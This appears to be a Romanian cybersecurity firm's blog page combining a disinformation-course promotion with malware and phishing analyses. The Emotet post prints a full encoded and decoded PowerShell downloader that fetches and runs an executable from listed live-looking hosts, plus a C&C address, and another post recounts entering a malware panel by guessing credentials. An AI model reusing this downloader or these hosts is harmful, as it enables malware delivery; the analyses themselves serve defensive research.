duminică, 7 iunie 2026

Combaterea dezinformării: curs practic de gândire critică și verificare a informației

 


Combaterea dezinformării începe cu o metodă, nu cu o opinie

Într-un mediu digital în care informația circulă mai repede decât capacitatea noastră de a o verifica, dezinformarea nu mai este doar o problemă de comunicare publică, ci o vulnerabilitate reală pentru cetățeni, organizații, instituții și comunități.

Știrile false, imaginile scoase din context, titlurile manipulative, clipurile virale, conturile coordonate, boții, conținutul generat de inteligența artificială și campaniile de influențare pot modifica percepții, pot alimenta conflicte sociale și pot determina decizii greșite.

Pentru a răspunde acestei provocări, Prodefence, prin platforma educațională CysEdu.eu, pune la dispoziție cursul:

Combaterea dezinformării – Gândire critică și verificarea informației

Cursul face parte din proiectul CyberAID A-D-A – Analizează, Decide, Acționează, o inițiativă educațională dedicată creșterii rezilienței digitale, informaționale și cognitive a utilizatorilor.

Ce este cursul „Combaterea dezinformării”

Cursul „Combaterea dezinformării” este un program practic de educație digitală, construit pentru a ajuta utilizatorii să înțeleagă cum funcționează manipularea informațională și cum pot verifica independent informațiile pe care le întâlnesc zilnic.

Cursul nu spune utilizatorului ce să creadă, nu oferă liste de „surse bune” și „surse rele” și nu impune concluzii asupra unor teme sensibile. În schimb, oferă o metodă clară prin care fiecare persoană poate analiza, verifica și evalua informațiile înainte de a le accepta, distribui sau folosi în luarea deciziilor.

Premisa cursului este una esențială: orice informație trebuie tratată ca o ipoteză până când este verificată independent. Cursul explică diferența dintre scepticism metodic și cinism, separă faptele de interpretări și opinii și oferă instrumente practice de verificare a informației.

De ce este necesar un curs despre combaterea dezinformării

Dezinformarea nu funcționează doar prin minciuni evidente. De multe ori, cele mai eficiente forme de manipulare folosesc informații parțial adevărate, imagini reale din alt context, cifre selectate convenabil sau titluri care induc o concluzie diferită față de conținut.

În prezent, utilizatorii sunt expuși constant la:

  • știri scoase din context;
  • imagini vechi prezentate ca fiind actuale;
  • titluri alarmiste;
  • interpretări prezentate ca fapte;
  • statistici selectate convenabil;
  • campanii coordonate pe rețele sociale;
  • conturi false sau automatizate;
  • conținut generat de inteligență artificială;
  • deepfake-uri și cheap fake-uri;
  • apeluri emoționale, urgente sau polarizante.

În acest context, abilitatea de a verifica informația devine o formă de protecție personală și profesională.

Structura cursului

Cursul este structurat în module clare, progresive, ușor de parcurs, fiecare construit în jurul unei competențe practice.

1. Premisa neutralității informaționale

Primul modul explică de ce nicio sursă nu trebuie considerată automat credibilă și de ce reputația unei surse nu înlocuiește verificarea. Cursantul învață să trateze informațiile ca ipoteze, nu ca fapte definitive.

Sunt explicate concepte precum:

  • informație neverificată;
  • informație parțial verificată;
  • informație verificată independent;
  • bias cognitiv;
  • diferența dintre scepticism și cinism.

Această parte este importantă deoarece pregătește cursantul să analizeze informația fără reacții automate, fără respingere instinctivă și fără acceptare necritică.

2. Anatomia unei afirmații

Unul dintre cele mai importante exerciții din curs este separarea dintre fapt, interpretare și opinie.

Această distincție este esențială. Multe materiale de presă, postări sau mesaje online amestecă fapte reale cu interpretări, concluzii emoționale sau opinii personale. Cursul arată cum poate fi descompusă o afirmație în elemente verificabile și cum pot fi identificate cuvintele-semnal care indică lipsa unei dovezi clare.

Cursantul învață să răspundă la întrebări de bază:

  • Cine spune informația?
  • Ce spune exact?
  • Când a fost publicată?
  • Unde a apărut prima dată?
  • De ce apare acum?
  • Cum este formulată?
  • Ce dovezi sunt oferite?

3. Metode de verificare independentă

Cursul introduce metode practice de verificare a informației, accesibile oricărui utilizator.

Sunt explicate metode precum:

  • identificarea sursei primare;
  • triangularea surselor;
  • căutarea inversă de imagini;
  • verificarea arhivelor web;
  • consultarea documentelor primare;
  • folosirea unor tehnici OSINT de bază.

Această parte este foarte utilă deoarece mută utilizatorul de la reacție la verificare. În loc să decidă pe baza emoției sau a reputației sursei, cursantul învață să caute confirmări independente și să înțeleagă dacă sursele se confirmă reciproc sau doar se copiază unele pe altele.

4. Tehnici de influențare a percepției

Un modul central al cursului este dedicat tehnicilor prin care percepția poate fi influențată.

Cursul explică, într-un limbaj clar, tehnici precum:

  • apelul la emoție;
  • apelul la autoritate;
  • apelul la urgență;
  • decontextualizarea;
  • cherry-picking statistic;
  • whataboutism;
  • falsa echivalență;
  • falsa dihotomie;
  • atacul la persoană;
  • framing;
  • anchoring;
  • bait-and-switch;
  • manipularea prin omisiune;
  • gish gallop;
  • repetiția ca instrument de influențare.

Scopul nu este ca utilizatorul să suspecteze permanent orice mesaj, ci să poată identifica mecanismele de influențare și să încetinească procesul de reacție.

5. Mediul digital și amplificarea dezinformării

Dezinformarea modernă nu funcționează izolat. Ea este amplificată de platforme, algoritmi, rețele sociale, conturi coordonate și mecanisme de engagement.

Cursul explică de ce platformele digitale favorizează conținutul emoțional, polarizant sau spectaculos și de ce engagement-ul nu este același lucru cu acuratețea.

Sunt abordate teme precum:

  • algoritmii de recomandare;
  • camerele de rezonanță;
  • bulele de filtrare;
  • boții;
  • astroturfing-ul;
  • conținutul generat de AI;
  • deepfake-urile și cheap fake-urile;
  • saturația informațională produsă de inteligența artificială.

Această parte este esențială pentru înțelegerea modului în care un mesaj fals, incomplet sau manipulator poate părea credibil doar pentru că este repetat, distribuit și susținut artificial.

6. Studii de caz și dinamici de erodare a încrederii

Cursul include studii de caz construite nu pentru a impune o poziție asupra unor teme sensibile, ci pentru a explica mecanismele prin care încrederea publică poate fi erodată.

Sunt analizate situații precum:

  • crize sanitare;
  • cicluri electorale contestate;
  • conflicte armate;
  • crize economice sau decizii de politică publică.

Abordarea este una echilibrată: cursul nu caută să stabilească cine „are dreptate”, ci arată cum informațiile incomplete, reacțiile emoționale, comunicarea defectuoasă și lipsa verificării pot alimenta neîncrederea.

7. Practica zilnică a verificării

Ultima parte a cursului este orientată spre comportament practic.

Cursanții primesc instrumente precum:

  • checklist personal de verificare în 60 de secunde;
  • checklist extins pentru verificare în 5 minute;
  • igienă informațională săptămânală;
  • igienă informațională lunară;
  • reguli pentru conversații dificile;
  • exerciții de autoevaluare;
  • metode de educare a altora fără ton moralizator.

Această parte este importantă deoarece obiectivul final al cursului nu este acumularea de informații, ci formarea unor reflexe.

Cui se adresează cursul

Cursul „Combaterea dezinformării” este recomandat pentru:

  • cetățeni care vor să consume informația mai responsabil;
  • părinți care vor să discute cu copiii despre manipulare online;
  • elevi și studenți;
  • profesori și formatori;
  • angajați din organizații publice și private;
  • jurnaliști și comunicatori;
  • responsabili de securitate;
  • echipe de comunicare instituțională;
  • ONG-uri și comunități civice;
  • persoane expuse la campanii de influențare, fraudă sau manipulare digitală.

Cursul este potrivit atât pentru utilizatori fără pregătire tehnică, cât și pentru profesioniști care au nevoie de o bază metodologică în verificarea informației.

Legătura cu proiectul CyberAID A-D-A

Cursul face parte din proiectul CyberAID A-D-A – Analizează, Decide, Acționează.

Modelul A-D-A propune o abordare simplă și practică:

Analizează – nu reacționa imediat; observă sursa, contextul, emoția și dovezile.
Decide – stabilește dacă informația este neverificată, parțial verificată, probabilă, confirmată sau neconcludentă.
Acționează – distribuie, respinge, verifică suplimentar sau oprește amplificarea informației.

Această abordare este esențială într-un mediu digital în care viteza reacției este adesea folosită împotriva utilizatorului.

De ce Prodefence dezvoltă astfel de cursuri

Prodefence dezvoltă programe educaționale dedicate securității cibernetice, protecției utilizatorilor și creșterii rezilienței digitale.

Dezinformarea, manipularea informațională și conținutul generat de inteligența artificială nu mai sunt probleme separate de securitatea cibernetică. Ele se intersectează cu frauda online, atacurile de social engineering, phishing-ul, compromiterea reputațională, polarizarea socială și manipularea deciziilor.

Prin CysEdu.eu și proiectul CyberAID A-D-A, Prodefence își propune să ofere utilizatorilor nu doar informații, ci instrumente practice de protecție.

Ce obține cursantul la final

La finalul cursului, participantul va putea:

  • să distingă între fapt, interpretare și opinie;
  • să identifice tehnici de manipulare informațională;
  • să verifice sursa primară a unei informații;
  • să aplice triangularea surselor;
  • să folosească metode simple de verificare a imaginilor și documentelor;
  • să recunoască apelurile la emoție, autoritate și urgență;
  • să înțeleagă rolul algoritmilor în amplificarea dezinformării;
  • să recunoască riscurile generate de conținutul AI;
  • să evite distribuirea informațiilor neverificate;
  • să discute mai eficient cu persoane care au opinii diferite;
  • să își construiască o igienă informațională de lungă durată.

Combaterea dezinformării este o competență de securitate digitală

În trecut, securitatea digitală era asociată mai ales cu parole, antivirus, phishing sau protecția datelor. Astăzi, securitatea digitală include și capacitatea de a nu fi manipulat informațional.

O persoană care nu verifică informațiile poate deveni, fără intenție, parte dintr-un lanț de distribuire a dezinformării. O organizație care nu își educă angajații poate deveni vulnerabilă la manipulare, panică, fraudă, decizii greșite sau atacuri reputaționale.

De aceea, combaterea dezinformării nu este doar responsabilitatea jurnaliștilor sau a instituțiilor. Este o competență necesară fiecărui utilizator conectat la mediul digital.

Accesează cursul pe platforma CysEdu: Combaterea dezinformării 

la Niciun comentariu:
Locația: România

marți, 10 martie 2020

Furt de date personale: Cont Paypal + Bancar, Carte de credit, Identitate, Email


Furt de date personale: Cont Paypal + Bancar, Carte de credit, Identitate, Email

/in /by
Furtul de date, a devenit una dintre cele mai practicate metode ale celor ce vor să facă bani ilegal.
Datele furate pot fi folosite in mai multe moduri, dar in acest articol vom vorrbi despre metoda phishing. Phishing-ul este o inșelătorie ce are loc in mediul online si se bazează pe credibilitatea potențialelor victime, dar și pe lipsa de educație in ceea ce privește siguranța online.
Acesta este un email de tip phishing, ce se presupuna ca vine de la Paypal si notifica utilizatorul ca exista probleme de securitate, cerând mai apoi o serie de date pentru “remedierea problemei”.
Sus se poate observa că a fost marcat ca Foarte Important, ca fiind Personal si cu raspuns de confirmare a primirii. Toate acestea pentru a mari credibilitatea mesajului.
In principiu se cere Confirmarea contului, acesta fiind limitat. Avem indicații pentru toată aceasta operațiune și ne anunța că după incheierea procedurii durează 2 zile până la confirmarea contului….
2 zile in care persoana din spatele operațiunii poate folosi fără probleme datele colectate.
Marcat cu roșu am atașat o parte din ceea ce nu se vede in email, mai exact, faptul că mesajul nu vine de la Paypal ci de la un domeniu oarecare.
Din nou pentru credibilitate redirectionează victima spre 2 pagini de securitate: Un anunț că a fost detectată o activitate anormală pe contul de Paypal si o formă de confirmare a persoanei din spatele calculatorului.
A 3-a pagină este un fals ce imita calea de acces in contul PayPal, unde se cere adresa de email/ telefon și parola.
Dacă observați in partea de sus a imaginilor apare adresa paginii web… si clar că nu are legatură cu platforma PayPal, adresa reala fiind: https://www.paypal.com/
După adaugare datelor de logare victima este direcționată spre alte pagini in care trebuie sa introducă… cam tot ce are. Aceasta campanie de phishing fiind una din cele mai complexe din căta am vazut. Asta, deoarece se atentează datele cartii de credit, datele contului bancar, date de identificare personală.
Prima campanie phishing in care se cere si adaugarea unui al doilea card de credit!
Și pentru a avea garanția că va putea accesa toate aceste cere in plus datele autentificării de siguranța a contului bancar precum și datele de logare pe adresa de email. In cazul in care ceva nu merge, să poată cere acces prin intermediul adresei de email, folosind cartea de identitate, permisul de conducere, pașaportul sau orice alt act a fost trimis de victimă.
Se confirmă faptul că (ti-au luat tot) s-a activat protectia contului si se face redirecționare catre pagian oficială PayPal, unde victima se loghează si totul o sa pară ok, neștiind că tocmai a dat toate datele unei persoane ce desfășoară activitați ilegale.
Cam acesta a fost articolul de astăzi. Sper să fie destul de educativ, incât sa se reducă numărul persoanelor ce devin victime ale furtului de date, bani, identitate.

Dacă aveți probleme și nu sunteți siguri de anumite email-uri importante, nu ezitați să ne contactați: contact@prodefence.ro

la Niciun comentariu:

Borr Malware – Acces in panoul de control

Acces pe panul de control al unui virus denumit BorrMalware.

Accesul a fost posibil in urma unor analize de securitate cibernetica si descoperirea adresei panoului.

Norocul nostru a fost setarea slaba a unor date de acces, care dupa cateva incercari au permis accesul la panoul hackerului.

Momentan are doar 2 victime, din care unul poate fi chiar al hackerului, in incercarea de testare a virusului…. se obisnuieste!

la Niciun comentariu:

Emotet – Virus bancar – Prezent pe domenii din Romania

Emotet – Virus bancar – Prezent pe domenii din Romania

Hai sa incepem cu informatii de baza!
Emotet este un virus din categoria Trojan, care are nevoie de acceptul victimei pentru a isi incepe activitatea in noua gazda.
Este un virus bancar, ce are ca scop extragerea de date personale, pentru ca hackerul sa poata utiliza contul sau cardul victimei in scopuri personale.
Daca la inceputuri era trimis prin email ca executabil, sau atasat(backdoor) anumitor programe “gratuite”, acum trimiterea lui se face prin intermediul unor documente ce sunt trimise prin email, iar aceste documente contin o comanda de descarcare si o adresa web, iar virusul este descarcat de acolo si actionand in noua gazda(pc, mobilr etc)
Aceasta metoda este folosita pentru a pacali atat protectia serviciilor de email, cat si viitoarea victima.
La intrarea virusului, cu acceptul victimei, sansele de scapare constau doar in posibilitatea de recunoastere a virusului respectiv de catre antivirus, firewall… in functie de ce are presupusa victima in dispozitiv.
Dar sa trecem la povestea noastra si o sa facem o mica analiza malware.
Zilnic apar liste cu Ip-uri, domenii, dispozitive compromise. Una din aceste liste contine doua domenii de Romania.
Se presupune ca sunt controlate de hackeri si folosite pentru a isi gazdui fisierele lor malware.
Accesam adresele si vedem ca ambele contin fisiere .doc.
De precizat ca pana aici Antivirusul nu reactioneaza.
Dupa cum se poate observa, fisierele sunt descarcate de pe aceste domenii de Romania (.ro) si apar ca fiind documente Microsoft Word 97-2003.
La scanare, virusul apare detectat de numai 18 si cei 60 de vendori prezenti pe platforma. Drept urmare, o mare parte si solutiile antivirus NU vor reactiona la aparitia virusului in dispozitiv.
In aceata varianta, doar aplicatiile celor de mai sus pot identifica virusul.
Iata si motivul detectiei slabe, virusul a fost creat… astazi. Ceea ce denota ca hackerul vine cu variante “curate” pentru a evita detectia.
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tGQWzXxxxhSt
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tBUxxxQWaf5EyJ8
Acum, pentru a avea o idee despre ce se intampla…
Comanda documentului arata cam asa: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /n “C:\Users\admin\AppData\Local\Temp\2050519442433378869714090.doc
Comanda folosita de Powershell este ascunsa si criptata:
Powershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==
Decryptata din Base64
$�M�a�t�e�d�v�t�n�d�=�’�H�i�j�r�l�k�l�c�n�b�’�;�$�X�g�m�x�i�j�l�q�i�c�k�l�i� �=� �’�1�3�9�’�;�$�L�a�y�p�o�t�w�k�n�=�’�S�s�k�f�c�d�s�i�k�w�c�c�’�;�$�Y�q�e�i�s�h�r�f�t�m�p�=�$�e�n�v�:�u�s�e�r�p�r�o�f�i�l�e�+�’�\�’�+�$�X�g�m�x�i�j�l�q�i�c�k�l�i�+�’�.�e�x�e�’�;�$�R�a�z�g�g�e�i�p�p�s�c�=�’�Y�k�q�b�t�x�p�z�’�;�$�S�n�y�l�e�t�z�k�f�j�f�n�=�&�(�’�n�e�’�+�’�w�-�o�’�+�’�b�’�+�’�j�e�c�t�’�)� �n�e�T�.�w�E�B�C�L�i�E�n�T�;�$�G�a�p�k�s�e�i�v�e�o�=�’�h�t�t�p�:�/�/�t�r�a�n�g�v�a�n�g�.�i�n�f�o�.�v�n�/�h�o�m�e�/�p�o�I�c�7�l�/��h�t�t�p�s�:�/�/�w�w�w�.�f�l�y�b�u�y�s�.�n�e�t�/�l�i�b�r�a�r�i�e�s�/�x�e�s�/��h�t�t�p�:�/�/�i�n�f�o�r�m�a�t�i�c�-�c�l�u�b�.�c�o�m�/�l�a�n�g�u�a�g�e�/�y�/��h�t�t�p�:�/�/�d�e�m�o�.�s�t�i�c�k�y�p�o�s�t�.�i�o�/�w�p�-�a�d�m�i�n�/�g�/��h�t�t�p�s�:�/�/�w�w�w�.�d�r�i�v�e�r�t�r�a�i�n�e�r�s�c�h�o�o�l�.�c�o�m�.�a�u�/�l�o�g�s�/�R�Y�J�P�g�r�K�O�J�/�’�.�”�s��p�l�I�T�"�(�[�c�h�a�r�]�4�2�)�;�$�G�z�j�i�u�a�h�j�y�r�y�x�t�=�'�H�g�k�c�d�s�d�f�'�;�f�o�r�e�a�c�h�(�$�K�x�z�t�a�l�h�p�i�n�v� �i�n� �$�G�a�p�k�s�e�i�v�e�o�)�{�t�r�y�{�$�S�n�y�l�e�t�z�k�f�j�f�n�.�"�d��o�w�N�L��O�a�D�F��i�l�E�”�(�$�K�x�z�t�a�l�h�p�i�n�v�,� �$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�Y�t�v�j�e�r�s�y�a�t�h�w�=�’�O�h�j�d�g�f�b�r�t�x�l�’�;�I�f� �(�(�.�(�’�G�e�t�-�’�+�’�I�t�e�m�’�)� �$�Y�q�e�i�s�h�r�f�t�m�p�)�.�”�l��e�n�g�t�H�"� �-�g�e� �3�2�6�8�1�)� �{�[�D�i�a�g�n�o�s�t�i�c�s�.�P�r�o�c�e�s�s�]�:�:�"�s��T�a�R�T�”�(�$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�O�h�d�u�j�p�w�h�m�z�t�a�g�=�’�D�w�l�k�w�n�w�j�z�y�u�s�’�;�b�r�e�a�k�;�$�X�x�o�l�v�k�t�q�=�’�H�q�h�u�j�j�g�z�d�z�’�}�}�c�a�t�c�h�{�}�}�$�A�f�i�i�s�x�d�v�=�’�Q�g�p�c�f�o�l�o�y�n�k�z�d�’�
Decryptata are mai multe informatii interesante:
$Matedvtnd=’Hijrlklcnb’;$Xgmxijlqickli = ‘139’;$Laypotwkn=’Sskfcdsikwcc’;$Yqeishrftmp=$env:userprofile+’\’+$Xgmxijlqickli+’.exe’;$Razggeippsc=’Ykqbtxpz’;$Snyletzkfjfn=&(‘ne’+’w-o’+’b’+’ject’) neT.wEBCLiEnT;$Gapkseiveo=’http://trangvang.info.vn/home/poIc7l/https://www.flybuys.net/libraries/xes/http://informatic-club.com/language/y/http://demo.stickypost.io/wp-admin/g/https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/‘.”splIT"([char]42);$Gzjiuahjyryxt='Hgkcdsdf';foreach($Kxztalhpinv in $Gapkseiveo){try{$Snyletzkfjfn."dowNLOaDFilE”($Kxztalhpinv, $Yqeishrftmp);$Ytvjersyathw=’Ohjdgfbrtxl’;If ((.(‘Get-‘+’Item’) $Yqeishrftmp).”lengtH" -ge 32681) {[Diagnostics.Process]::"sTaRT”($Yqeishrftmp);$Ohdujpwhmztag=’Dwlkwnwjzyus’;break;$Xxolvktq=’Hqhujjgzdz’}}catch{}}$Afiisxdv=’Qgpcfoloynkzd’
Se pot observa domeniile accesate pentru a descarca virusul, dar si comenzile de Download, GET, Item, Start…
Se pare ca intradevar acel document nu este doar ceva de citit, ci contine comenzi de descarcare a unui fisier care stim ce este, dar poate fi orice altceva.
Mai in detaliu: $Xgmxijlqickli = ‘139’ +$Xgmxijlqickli+’.exe … deci avem un 139.exe, nu?
Avem polc7l care este descris ca fiind ATLUtils Module – adica Active Template Library si mai exact este chiar fisierul nostru 139.exe.
14 din 73… destul de rau pentru posibilele victime!
Acest fisier odata executat, instaleza un alt .exe in dispozitivul victimei(da, deja victima).
Acesta se conecteaza la Ip-ul/host-ul de unde vin toate comenzile hackerului.
Virusul in sine preia comenzi date de hacker si le executa la nivel de dispozitiv.
Exemple: se poate raspandi in retea, colecteaza date, trimite date, ataca, stocheaza date, spioneaza tastatura/camera/monitor etc.
In cazul nostru dispozitivul se conecteaza la adresa http://68.114.229.171/, iar acolo se gaseste acel C&C Panel, adica Panoul de Comanda si Control al atacatorului.
Cam asta ar fi pentru astazi.
In concluzie, daca ai o pagina web sau un server si nu sunt protejate, poti deveni parte activa la activitatile ilegale ale hackerilor.
Deocamdata acest lucru nu este pedepsit, dar… in timp lucrurile se pot schimba!
In ceea ce priveste adevarata victima, grija la ce documente accesati, indiferent de la cine credeti ca provin.
Tags: , , , , , , , ,
la Niciun comentariu:
Etichete: , , , , , , , ,
Locația: Romania

duminică, 3 noiembrie 2019

Fresh Ursnif (GOZI/ ISFB) campaign

Some Russian campaign running over leaked email spreads different kind of malware. Today on Yahoo mail has come some fresh Ursnif with 0 detections. |
The domain used for my email was inactive and there was no file for download, but I found it somewhere else.
In the pictures below will find the research steps:
Was easy to find a sample of malware using the SHA256 (d6c0ca87f712c0633eab5ac020ceaad2e256cd3251808ce7c7b45faf4042123e) on Google.
The .zip file is detected and this may be an advantage for the users IF they are using the Antivirus that have on his database this sample… but this is another discussion…
At this moment the VirusTotal says 18/57.. so is going to be better in a few hours.
Now.. extracting them one by one we have a good encrypted malware named Ursnif (GOZI/ ISFB). This malware is trying to steal baking credentials from his victims and the hacker may have access to the system.
I will not explain the whole process at this time but the way to do that you will find it on the recent post I’ve made:
https://www.prodefence.org/malware-analysis-gozi-ifsb-bank-trojan-aka-ursnif/
Useful links:
Urlscan with samples
VirusTotal .zip
VirusTotal .js
VirusTotal .bin
la Niciun comentariu:
Etichete: , , , , , ,

sâmbătă, 7 septembrie 2019

Malware analysis Gozi IFSB – Bank Trojan aka Ursnif

This is the Gozi IFSB malware, created to steal data & informations from the victims. In the folder you will see all the files needed to create your own malware server.
For this malware analysis I will use an .bin found after google search.
Cyber security - Malware analysis
With this .bin file I will be 2 steps closer for the analysis. I don’t have the .doc/.pdf file with the payload, but the .bin is the downloaded file resulted from the payload.
I will transform the .bin file to infected.exe(10000.exe)!
008c4bd6ee834d113cfc693af0ea90396eaa47e860bcdd567ffd964b57434e1d.bin
MD5: e6d118192fc848797e15dc0600834783
SHA1: 16d5ded68677f4a870423d3fd30da8377a5b2408
Let’s go to security manipulation and creation of the malware on the system. The $LN33 it is exported by the executable, after that will jump to C Runtime Library.
Calling the security_init_cookie for buffer overrun protection to comprommise the system security.
Cyber security - Malware analysis Prodefence SRL
Let’s run the infected file to see his actions!
I see that the explorer.exe has some activiti.
Cyber security - Malware analysis
SC Prodefence SRL
Cyber security – Malware analysis
There I have some movements… let’s go to \Roaming\MIcrosoft\ to see the new folder created ‘BthM300C’.
SC Prodefence SRL
An executable(the same .exe with diffrerent name) created in new folder after runed the infected.exe / D3DCsapi.exe aka 1000.exe
Cyber security - Malware analysis
The Registry.
Cyber security - Malware analysis
Prodefence SRL
Now… the explorer.exe.
24 .dll are suspicious.
That means some of them are from the injection process.
Cyber security - Malware analysis
explorer.exe (2304)  – 52074 – 166.124.148.146.bc.googleusercontent.com.
This is an Google Cloud Platform and the explorer.exe has some connections there.
genesisgrandergh.at
  • Port: 62809, Dst Port: 53
  • Standard query response 0xd314 Server failure
  • ns1.suspended-domain.com
bitsupport.top
  • Standard query response 0xd314 Server failure
  • ns1.suspended-domain.com
carloslimmheklo.at
  • Port: 58097, Dst Port: 53
  • ns1.suspended-domain.com
databasecollection.pw  OK
  • Port: 62809, Dst Port: 53
  • Pubkey: 04b7b8c4d1d482255514ccf90c896acb7b5baaa7208eea67
Name Servers:
  • ns4.sinkhole.ch
  • ns3.sinkhole.ch
  • ns2.sinkhole.ch
  • ns1.sinkhole.ch
Now … becouse I have some extra informations.. I will try to find more infected domains.
The Gozi malware is using friendly websites to infect the visitors, others trojans or payloads included on .doc files, for better security bypass.
Virus Total Report
https://www.virustotal.com/#/file/008c4bd6ee834d113cfc693af0ea90396eaa47e860bcdd567ffd964b57434e1d/detection
sinkhole.ch server hosting malware
https://www.malwareurl.com/ns_listing.php?ns=ns2.sinkhole.ch
https://securitytrails.com/list/ns/NS1.SINKHOLE.CH?ref=abuseipdb
About Gozi(Ursniff)
https://www.secureworks.com/research/gozihttps://www.csoonline.com/article/2123315/identity-theft-prevention/inside-the-global-hacker-service-economy.html?page=2
la Niciun comentariu:
Etichete: , , , , , , ,
Abonați-vă la: Postări (Atom)